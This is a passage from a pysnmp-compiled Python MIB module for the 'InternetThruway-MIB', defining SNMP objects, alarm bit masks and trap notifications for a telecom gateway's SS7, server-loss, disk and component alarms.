if mibBuilder.loadTexts: linkAlignTimeStamp.setDescription('Indicates the time of the alarm.')
linkAlignCardId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkAlignCardId.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignCardId.setDescription('This object identifies the device that hosts the failed link. It provides a physical description of the device, as well as its slot number.')
linkAlignLinkSet = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1, 8), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkAlignLinkSet.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignLinkSet.setDescription('This object identifies the linkset associated with the link via its adjacent point code.')
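# --- CSG complex state trap payload -------------------------------------------
# Scalars carried in the csgComplexStateTrap* notifications: identity and
# operational/standby/availability states of the local node and its mate,
# plus the overall complex alarm status.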
csgComplexStateTrapInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22))
cplxName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxName.setStatus('mandatory')
if mibBuilder.loadTexts: cplxName.setDescription('CLLI, A unique identifier of the CSG Complex.')
cplxLocEthernetName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxLocEthernetName.setStatus('mandatory')
if mibBuilder.loadTexts: cplxLocEthernetName.setDescription(' The EthernetName attribute value of the node.')
cplxLocEthernetIP = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxLocEthernetIP.setStatus('mandatory')
if mibBuilder.loadTexts: cplxLocEthernetIP.setDescription(' The EthernetIP attribute value of the node.')
cplxLocOperationalState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxLocOperationalState.setStatus('mandatory')
if mibBuilder.loadTexts: cplxLocOperationalState.setDescription(' The OperationalState of the node. Possible values are: UNKNOWN, ENABLED, ENABLED_NETDSC, ENABLED_NETPAR, DISABLED ')
cplxLocStandbyState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxLocStandbyState.setStatus('mandatory')
if mibBuilder.loadTexts: cplxLocStandbyState.setDescription(' The StandbyState attribute value of the node. Possible values are: UNKNOWN, HOT_STANDBY, COLD_STANDBY, WARM_STANDBY, PROVIDING_SERVICE ')
cplxLocAvailabilityState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxLocAvailabilityState.setStatus('mandatory')
if mibBuilder.loadTexts: cplxLocAvailabilityState.setDescription(' The AvailabilityState attribute value of the node. Possible values are: UNKNOWN, AVAILABLE, DEGRADED, OFFLINE ')
cplxMateEthernetName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxMateEthernetName.setStatus('mandatory')
if mibBuilder.loadTexts: cplxMateEthernetName.setDescription(' The EthernetName attribute value of the mate node.')
cplxMateEthernetIP = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 8), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxMateEthernetIP.setStatus('mandatory')
if mibBuilder.loadTexts: cplxMateEthernetIP.setDescription(' The EthernetIP attribute value of the mate node.')
cplxMateOperationalState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 9), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxMateOperationalState.setStatus('mandatory')
if mibBuilder.loadTexts: cplxMateOperationalState.setDescription(' The OperationalState of the mate node. Possible values are: UNKNOWN, ENABLED, ENABLED_NETDSC, ENABLED_NETPAR, DISABLED ')
cplxMateStandbyState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 10), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxMateStandbyState.setStatus('mandatory')
if mibBuilder.loadTexts: cplxMateStandbyState.setDescription(' The StandbyState attribute value of the mate node. Possible values are: UNKNOWN, HOT_STANDBY, COLD_STANDBY, WARM_STANDBY, PROVIDING_SERVICE ')
cplxMateAvailabilityState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 11), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxMateAvailabilityState.setStatus('mandatory')
if mibBuilder.loadTexts: cplxMateAvailabilityState.setDescription(' The AvailabilityState attribute value of the mate node. Possible values are: UNKNOWN, AVAILABLE, DEGRADED, OFFLINE ')
cplxAlarmStatus = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 12), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxAlarmStatus.setStatus('mandatory')
if mibBuilder.loadTexts: cplxAlarmStatus.setDescription('This object indicates the alarm status of the CSG Complex. Possible status are: NORMAL, MAJOR, CRITICAL ')
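# --- Lost Server alarm table ---------------------------------------------------
# One row per server with which contact has been lost; rows are indexed by
# lsIndex.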
lostServerAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 1), )
if mibBuilder.loadTexts: lostServerAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: lostServerAlarmTable.setDescription('The LostServerAlarmTable contains alarms which indicate that contact with a server has been lost.')
lostServerAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 1, 1), ).setIndexNames((0, "InternetThruway-MIB", "lsIndex"))
if mibBuilder.loadTexts: lostServerAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: lostServerAlarmTableEntry.setDescription('This object defines a row within the Lost Server Alarm Table. A row can be uniquely identified with the row index.')
lsIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: lsIndex.setStatus('mandatory')
if mibBuilder.loadTexts: lsIndex.setDescription('Identifies the row number in the table.')
lsKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 1, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsKey.setStatus('mandatory')
if mibBuilder.loadTexts: lsKey.setDescription('Unique identifier for the alarm.')
lsIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 1, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: lsIPAddress.setDescription('This object identifies the IP Address of the machine which is lost.')
lsName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 1, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsName.setStatus('mandatory')
if mibBuilder.loadTexts: lsName.setDescription('The configured name associated with the IP Address of the machine which is lost.')
lsTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 1, 1, 5), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: lsTimeStamp.setDescription('Indicates the time of the alarm.')
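# --- Alarm mask and status bit fields ------------------------------------------
# alarmMaskInt1/alarmMaskInt2 let a manager filter trap types (read-write);
# alarmStatusInt1..3 report which alarms are currently raised (read-only).
# The bit assignments are spelled out in each object's DESCRIPTION below.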
alarmMaskInt1 = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 1), Gauge32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: alarmMaskInt1.setStatus('mandatory')
if mibBuilder.loadTexts: alarmMaskInt1.setDescription('The value of this bit mask reflects the current filtering policy of CSG events and alarms. Management stations which wish to not receive certain events or alarm types from the CSG can modify this value as needed. Note, however, that changes in the filtration policy affect what is received by all management stations. Initially, the bit mask is set so that all bits are in a false state. Each bit in a true state reflects a currently filtered event, alarm, or alarm type. The actual bit position meanings are given below. Bit 0 is LSB. Bits 0 = Generic Normal Alarm 1 = Generic Warning Alarm 2 = Generic Minor Alarm 3 = Generic Major Alarm 4 = Generic Critical Alarm 5 = Partition Space Alarm 6 = Home Gateway Failure Alarm 7 = Component Not In Provisioned State Alarm 8 = Component Debug On Alarm 9 = Component Multiple Restart Alarm 10 = Component Restart Warning 11 = NAS Registration Failure Warning 12 = NAS Failure Alarm 13 = File Deletion Warning 14 = File Backup Warning 15 = Sysman Restart Warning 16 = File Access Warning 17 = Home Gateway/NAS Provisioning Mismatch Warning 18 = SS7 Link Failure Alarm 19 = SS7 Link Congestion Alarm 20 = ISUP Failure Alarm 21 = ISUP Congestion Alarm 22 = SS7 FEP Congestion Alarm 23 = SS7 BEP Congestion Alarm 24 = High Availability Peer Contact Lost Alarm 25 = SS7 MTP3 Congestion Alarm 26 = SS7 MTP2 Trunk Failure Alarm 27 = SS7 Linkset Failure Alarm 28 = SS7 Destination Inaccessible Alarm 29 = SS7 Destination Congested Alarm 30 = SS7 Link Alignment Failure Alarm ')
alarmStatusInt1 = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 2), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alarmStatusInt1.setStatus('mandatory')
if mibBuilder.loadTexts: alarmStatusInt1.setDescription('The value of this bit mask indicates that current status of CSG component alarms. Each components is represented by a single bit within the range occupied by each component alarm type. Each bit in a true state reflects a currently raised alarm. The actual bit position meanings are given below. Bit 0 is the LSB. Bits 0-15 = Component Not In Provisioned State Alarm 16-31 = Component Multi Restart Alarm ')
alarmStatusInt2 = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 3), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alarmStatusInt2.setStatus('mandatory')
if mibBuilder.loadTexts: alarmStatusInt2.setDescription('The value of this bit mask indicates the current status of active CSG alarms. Component-related alarms occupy a range of bits: each bit within that range represents the alarm status for a particular component. Each bit in a true state reflects a currently raised alarm. The actual bit position meanings are given below. Bit 0 is the LSB. Bits 0-15 = Component Debug On Alarm 16-23 = Partition Space Alarm 24 = Home Gateway Failure Alarm 25 = NAS Failure Alarm 26 = SS7 Link Failure Alarm 27 = SS7 Link Congestion Alarm 28 = ISUP Failure Alarm 29 = ISUP Congestion Alarm 30 = High Availability Peer Contact Lost Alarm 31 = SS7 MTP3 Congestion Alarm ')
alarmStatusInt3 = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alarmStatusInt3.setStatus('mandatory')
if mibBuilder.loadTexts: alarmStatusInt3.setDescription('The value of this bit mask indicates the current status of active CSG alarms. Each bit in a true state reflects a currently raised alarm. The actual bit position meanings are given below. Bit 0 is the LSB. Bits 0 = SS7 MTP2 Trunk Failure Alarm 1 = SS7 Linkset Failure Alarm 2 = SS7 Destination Inaccessible Alarm 3 = SS7 Destination Congestion Alarm 4 = SS7 Link Alignment Failure Alarm 5 = CSG Complex Status Alarm 6 = External Ethernet Alarm ')
alarmMaskInt2 = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 5), Gauge32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: alarmMaskInt2.setStatus('mandatory')
if mibBuilder.loadTexts: alarmMaskInt2.setDescription('The value of this bit mask reflects the current additional filtering policy of CSG events and alarms. Management stations which wish to not receive certain events or alarm types from the CSG can modify this value as needed. Note, however, that changes in the filtration policy affect what is received by all management stations. Initially, the bit mask is set so that all bits are in a false state. Each bit in a true state reflects a currently filtered event, alarm, or alarm type. The actual bit position meanings are given below. Bit 0 is LSB. Bits 0 = External Ethernet Alarm 1 = Cluster Information retrieval Alarm ')
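# --- Generic trap varbind objects -----------------------------------------------
# Scalars intended to be carried as variable bindings in the notifications
# defined below (component name, file name, date, generic text, identification
# key, source IP address/name and timestamp).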
trapCompName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 3, 1), DisplayString())
if mibBuilder.loadTexts: trapCompName.setStatus('mandatory')
if mibBuilder.loadTexts: trapCompName.setDescription('OID for the Component name.')
trapFileName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 3, 2), DisplayString())
if mibBuilder.loadTexts: trapFileName.setStatus('mandatory')
if mibBuilder.loadTexts: trapFileName.setDescription('OID for file Name.')
trapDate = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 3, 3), TimeString())
if mibBuilder.loadTexts: trapDate.setStatus('mandatory')
if mibBuilder.loadTexts: trapDate.setDescription('OID for the date.')
trapGenericStr1 = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 3, 4), DisplayString())
if mibBuilder.loadTexts: trapGenericStr1.setStatus('mandatory')
if mibBuilder.loadTexts: trapGenericStr1.setDescription('OID for the generic data.')
trapIdKey = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 3, 5), Integer32())
if mibBuilder.loadTexts: trapIdKey.setStatus('mandatory')
if mibBuilder.loadTexts: trapIdKey.setDescription('OID for the identification key.')
trapIPAddress = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 3, 6), IpAddress())
if mibBuilder.loadTexts: trapIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: trapIPAddress.setDescription('OID for IP address.')
trapName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 3, 7), DisplayString())
if mibBuilder.loadTexts: trapName.setStatus('mandatory')
if mibBuilder.loadTexts: trapName.setDescription('OID for configured name associated with an IpAddress.')
trapTimeStamp = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 3, 8), DisplayString())
if mibBuilder.loadTexts: trapTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: trapTimeStamp.setDescription('Indicates the time at which the alarm occurred.')
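# --- Notification (trap) definitions --------------------------------------------
# Alarm/clear trap pairs for disk space, the external ethernet card, component
# debug/state/restart, SS7 links, linksets, destinations, ISUP, MTP2/MTP3,
# cluster and CSG complex state, generic severities, and Home Gateway/NAS
# status.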
diskSpaceClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,1001)).setObjects(("InternetThruway-MIB", "partitionSpaceKey"), ("InternetThruway-MIB", "partitionIndex"), ("InternetThruway-MIB", "partitionName"), ("InternetThruway-MIB", "partitionPercentFull"), ("InternetThruway-MIB", "partitionSpaceTimeStamp"))
if mibBuilder.loadTexts: diskSpaceClear.setDescription('The Trap generated when a disk partition has a space increase after a previously sent DiskSpaceAlarm.')
diskSpaceAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,1004)).setObjects(("InternetThruway-MIB", "partitionSpaceKey"), ("InternetThruway-MIB", "partitionIndex"), ("InternetThruway-MIB", "partitionName"), ("InternetThruway-MIB", "partitionPercentFull"), ("InternetThruway-MIB", "partitionSpaceTimeStamp"))
if mibBuilder.loadTexts: diskSpaceAlarm.setDescription('The Trap generated when a disk partition is running out of space provisioned state.')
etherCardTrapClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,1011))
if mibBuilder.loadTexts: etherCardTrapClear.setDescription(' The Trap generated when the external ethernet card becomes available.')
etherCardTrapMajor = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,1014))
if mibBuilder.loadTexts: etherCardTrapMajor.setDescription('The Trap generated when the external ethernet card is down.')
etherCardTrapCritical = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,1015))
if mibBuilder.loadTexts: etherCardTrapCritical.setDescription('The Trap generated when the external ethernet card is down.')
compDebugOff = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,2001)).setObjects(("InternetThruway-MIB", "compDebugKey"), ("InternetThruway-MIB", "componentIndex"), ("InternetThruway-MIB", "componentName"), ("InternetThruway-MIB", "compDebugTimeStamp"))
if mibBuilder.loadTexts: compDebugOff.setDescription('The Trap generated when a Component turns off its debug info.')
compDebugOn = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,2002)).setObjects(("InternetThruway-MIB", "compDebugKey"), ("InternetThruway-MIB", "componentIndex"), ("InternetThruway-MIB", "componentName"), ("InternetThruway-MIB", "compDebugTimeStamp"))
if mibBuilder.loadTexts: compDebugOn.setDescription('The Trap generated when a Component turns on its debug info.')
compStateClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,2011)).setObjects(("InternetThruway-MIB", "compProvStateKey"), ("InternetThruway-MIB", "componentIndex"), ("InternetThruway-MIB", "componentName"), ("InternetThruway-MIB", "compProvStateStatus"), ("InternetThruway-MIB", "compSecsInCurrentState"), ("InternetThruway-MIB", "compProvStateTimeStamp"))
if mibBuilder.loadTexts: compStateClear.setDescription('The Trap generated when a component goes to its provisioned states after a CompStatusAlarm trap has been sent.')
compStateAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,2014)).setObjects(("InternetThruway-MIB", "compProvStateKey"), ("InternetThruway-MIB", "componentIndex"), ("InternetThruway-MIB", "componentName"), ("InternetThruway-MIB", "compProvStateStatus"), ("InternetThruway-MIB", "compSecsInCurrentState"), ("InternetThruway-MIB", "compProvStateTimeStamp"))
if mibBuilder.loadTexts: compStateAlarm.setDescription('The Trap generated when a component is not in its provisioned state.')
restartStateClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,2021)).setObjects(("InternetThruway-MIB", "compRestartKey"), ("InternetThruway-MIB", "componentIndex"), ("InternetThruway-MIB", "componentName"), ("InternetThruway-MIB", "compRestartStatus"), ("InternetThruway-MIB", "compRestartTimeStamp"))
if mibBuilder.loadTexts: restartStateClear.setDescription('The Trap generated when a component goes to its provisioned states after a RestartStateAlarm trap has been sent.')
restartStateAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,2024)).setObjects(("InternetThruway-MIB", "compRestartKey"), ("InternetThruway-MIB", "componentIndex"), ("InternetThruway-MIB", "componentName"), ("InternetThruway-MIB", "compRestartStatus"), ("InternetThruway-MIB", "compRestartTimeStamp"))
if mibBuilder.loadTexts: restartStateAlarm.setDescription('The Trap generated when a component restarts repeatedly.')
ss7LinkFailureAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3004)).setObjects(("InternetThruway-MIB", "lfIndex"), ("InternetThruway-MIB", "lfKey"), ("InternetThruway-MIB", "lfIPAddress"), ("InternetThruway-MIB", "lfLinkCode"), ("InternetThruway-MIB", "lfName"), ("InternetThruway-MIB", "lfCardId"), ("InternetThruway-MIB", "lfLinkSet"), ("InternetThruway-MIB", "lfTimeStamp"))
if mibBuilder.loadTexts: ss7LinkFailureAlarm.setDescription('Trap generated for an SS7 link failure.')
ss7LinkFailureClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3001)).setObjects(("InternetThruway-MIB", "lfIndex"), ("InternetThruway-MIB", "lfKey"), ("InternetThruway-MIB", "lfIPAddress"), ("InternetThruway-MIB", "lfLinkCode"), ("InternetThruway-MIB", "lfName"), ("InternetThruway-MIB", "lfCardId"), ("InternetThruway-MIB", "lfLinkSet"), ("InternetThruway-MIB", "lfTimeStamp"))
if mibBuilder.loadTexts: ss7LinkFailureClear.setDescription('Trap generated to clear an SS7 link failure.')
ss7LinkCongestionAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3012)).setObjects(("InternetThruway-MIB", "lcIndex"), ("InternetThruway-MIB", "lcKey"), ("InternetThruway-MIB", "lcIPAddress"), ("InternetThruway-MIB", "lcLinkCode"), ("InternetThruway-MIB", "lcName"), ("InternetThruway-MIB", "lcCardId"), ("InternetThruway-MIB", "lcLinkSet"), ("InternetThruway-MIB", "lcTimeStamp"))
if mibBuilder.loadTexts: ss7LinkCongestionAlarm.setDescription('Trap generated for congestion on an SS7 Link.')
ss7LinkCongestionClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3011)).setObjects(("InternetThruway-MIB", "lcIndex"), ("InternetThruway-MIB", "lcKey"), ("InternetThruway-MIB", "lcIPAddress"), ("InternetThruway-MIB", "lcLinkCode"), ("InternetThruway-MIB", "lcName"), ("InternetThruway-MIB", "lcCardId"), ("InternetThruway-MIB", "lcLinkSet"), ("InternetThruway-MIB", "lcTimeStamp"))
if mibBuilder.loadTexts: ss7LinkCongestionClear.setDescription('Trap generated to indicate there is no longer congestion on an SS7 link.')
ss7ISUPFailureAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3025)).setObjects(("InternetThruway-MIB", "ifIndex"), ("InternetThruway-MIB", "ifKey"), ("InternetThruway-MIB", "ifIPAddress"), ("InternetThruway-MIB", "ifName"), ("InternetThruway-MIB", "ifTimeStamp"))
if mibBuilder.loadTexts: ss7ISUPFailureAlarm.setDescription('Trap generated to indicate ISUP failure.')
ss7ISUPFailureClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3021)).setObjects(("InternetThruway-MIB", "ifIndex"), ("InternetThruway-MIB", "ifKey"), ("InternetThruway-MIB", "ifIPAddress"), ("InternetThruway-MIB", "ifName"), ("InternetThruway-MIB", "ifTimeStamp"))
if mibBuilder.loadTexts: ss7ISUPFailureClear.setDescription('Trap generated to clear an ISUP failure alarm.')
ss7ISUPCongestionAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3033)).setObjects(("InternetThruway-MIB", "icIndex"), ("InternetThruway-MIB", "icKey"), ("InternetThruway-MIB", "icIPAddress"), ("InternetThruway-MIB", "icCongestionLevel"), ("InternetThruway-MIB", "icName"), ("InternetThruway-MIB", "icTimeStamp"))
if mibBuilder.loadTexts: ss7ISUPCongestionAlarm.setDescription('Trap generated to indicate congestion with the ISUP protocol stack.')
ss7ISUPCongestionClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3031)).setObjects(("InternetThruway-MIB", "icIndex"), ("InternetThruway-MIB", "icKey"), ("InternetThruway-MIB", "icIPAddress"), ("InternetThruway-MIB", "icCongestionLevel"), ("InternetThruway-MIB", "icName"), ("InternetThruway-MIB", "icTimeStamp"))
if mibBuilder.loadTexts: ss7ISUPCongestionClear.setDescription('Trap generated to indicate there is no longer congestion with the ISUP protocol stack.')
ss7FEPCongestionWarning = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3042)).setObjects(("InternetThruway-MIB", "trapIdKey"), ("InternetThruway-MIB", "trapIPAddress"), ("InternetThruway-MIB", "trapName"), ("InternetThruway-MIB", "trapTimeStamp"))
if mibBuilder.loadTexts: ss7FEPCongestionWarning.setDescription('Notification trap generated to indicate congestion encountered by the SS7 front-end process.')
ss7BEPCongestionWarning = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3052)).setObjects(("InternetThruway-MIB", "trapIdKey"), ("InternetThruway-MIB", "trapIPAddress"), ("InternetThruway-MIB", "trapName"), ("InternetThruway-MIB", "trapTimeStamp"))
if mibBuilder.loadTexts: ss7BEPCongestionWarning.setDescription('Notification trap generated to indicate congestion encountered by the SS7 back-end process.')
ss7MTP3CongestionMinor = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3063)).setObjects(("InternetThruway-MIB", "mtp3Index"), ("InternetThruway-MIB", "mtp3Key"), ("InternetThruway-MIB", "mtp3IPAddress"), ("InternetThruway-MIB", "mtp3Name"), ("InternetThruway-MIB", "mtp3TimeStamp"))
if mibBuilder.loadTexts: ss7MTP3CongestionMinor.setDescription('Trap generated for MTP3 congestion.')
ss7MTP3CongestionMajor = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3064)).setObjects(("InternetThruway-MIB", "mtp3Index"), ("InternetThruway-MIB", "mtp3Key"), ("InternetThruway-MIB", "mtp3IPAddress"), ("InternetThruway-MIB", "mtp3Name"), ("InternetThruway-MIB", "mtp3TimeStamp"))
if mibBuilder.loadTexts: ss7MTP3CongestionMajor.setDescription('Trap generated for MTP3 congestion.')
ss7MTP3CongestionCritical = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3065)).setObjects(("InternetThruway-MIB", "mtp3Index"), ("InternetThruway-MIB", "mtp3Key"), ("InternetThruway-MIB", "mtp3IPAddress"), ("InternetThruway-MIB", "mtp3Name"), ("InternetThruway-MIB", "mtp3TimeStamp"))
if mibBuilder.loadTexts: ss7MTP3CongestionCritical.setDescription('Trap generated for MTP3 congestion.')
ss7MTP3CongestionClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3061)).setObjects(("InternetThruway-MIB", "mtp3Index"), ("InternetThruway-MIB", "mtp3Key"), ("InternetThruway-MIB", "mtp3IPAddress"), ("InternetThruway-MIB", "mtp3Name"), ("InternetThruway-MIB", "mtp3TimeStamp"))
if mibBuilder.loadTexts: ss7MTP3CongestionClear.setDescription('Trap generated to indicate there is no longer MTP3 congestion.')
ss7MTP2TrunkFailureAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3075)).setObjects(("InternetThruway-MIB", "mtp2Index"), ("InternetThruway-MIB", "mtp2Key"), ("InternetThruway-MIB", "mtp2IPAddress"), ("InternetThruway-MIB", "mtp2Name"), ("InternetThruway-MIB", "mtp2CardId"), ("InternetThruway-MIB", "mtp2AlarmCondition"), ("InternetThruway-MIB", "mtp2TimeStamp"))
if mibBuilder.loadTexts: ss7MTP2TrunkFailureAlarm.setDescription('Trap generated to indicate an MTP2 trunk failure condition.')
ss7MTP2TrunkFailureClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3071)).setObjects(("InternetThruway-MIB", "mtp2Index"), ("InternetThruway-MIB", "mtp2Key"), ("InternetThruway-MIB", "mtp2IPAddress"), ("InternetThruway-MIB", "mtp2Name"), ("InternetThruway-MIB", "mtp2CardId"), ("InternetThruway-MIB", "mtp2TimeStamp"))
if mibBuilder.loadTexts: ss7MTP2TrunkFailureClear.setDescription('Trap generated to clear an MTP2 trunk failure alarm.')
ss7LinksetFailureAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3085)).setObjects(("InternetThruway-MIB", "lsFailureIndex"), ("InternetThruway-MIB", "lsFailureKey"), ("InternetThruway-MIB", "lsFailureIPAddress"), ("InternetThruway-MIB", "lsFailureName"), ("InternetThruway-MIB", "lsFailurePointcode"), ("InternetThruway-MIB", "lsFailureTimeStamp"))
if mibBuilder.loadTexts: ss7LinksetFailureAlarm.setDescription('Trap generated to indicate a linkset failure.')
ss7LinksetFailureClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3081)).setObjects(("InternetThruway-MIB", "lsFailureIndex"), ("InternetThruway-MIB", "lsFailureKey"), ("InternetThruway-MIB", "lsFailureIPAddress"), ("InternetThruway-MIB", "lsFailureName"), ("InternetThruway-MIB", "lsFailurePointcode"), ("InternetThruway-MIB", "lsFailureTimeStamp"))
if mibBuilder.loadTexts: ss7LinksetFailureClear.setDescription('Trap generated to clear a linkset failure alarm.')
ss7DestinationInaccessible = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3092)).setObjects(("InternetThruway-MIB", "destInaccessIndex"), ("InternetThruway-MIB", "destInaccessKey"), ("InternetThruway-MIB", "destInaccessIPAddress"), ("InternetThruway-MIB", "destInaccessName"), ("InternetThruway-MIB", "destInaccessPointcode"), ("InternetThruway-MIB", "destInaccessTimeStamp"))
if mibBuilder.loadTexts: ss7DestinationInaccessible.setDescription('Trap generated to indicate that a signalling destination is inaccessible. A destination is considered inaccessible once Transfer Prohibited (TFP) messages are received which indicate that the route to that destination is prohibited.')
ss7DestinationAccessible = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3091)).setObjects(("InternetThruway-MIB", "destInaccessIndex"), ("InternetThruway-MIB", "destInaccessKey"), ("InternetThruway-MIB", "destInaccessIPAddress"), ("InternetThruway-MIB", "destInaccessName"), ("InternetThruway-MIB", "destInaccessPointcode"), ("InternetThruway-MIB", "destInaccessTimeStamp"))
if mibBuilder.loadTexts: ss7DestinationAccessible.setDescription('Trap generated to clear a destination inaccessible alarm. An inaccessible signalling destination is considered accessible once Transfer Allowed (TFA) messages are sent along its prohibited signalling routes.')
ss7DestinationCongestedAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3103)).setObjects(("InternetThruway-MIB", "destCongestIndex"), ("InternetThruway-MIB", "destCongestKey"), ("InternetThruway-MIB", "destCongestIPAddress"), ("InternetThruway-MIB", "destCongestName"), ("InternetThruway-MIB", "destCongestPointcode"), ("InternetThruway-MIB", "destCongestCongestionLevel"), ("InternetThruway-MIB", "destCongestTimeStamp"))
if mibBuilder.loadTexts: ss7DestinationCongestedAlarm.setDescription('Trap generated to indicate congestion at an SS7 destination.')
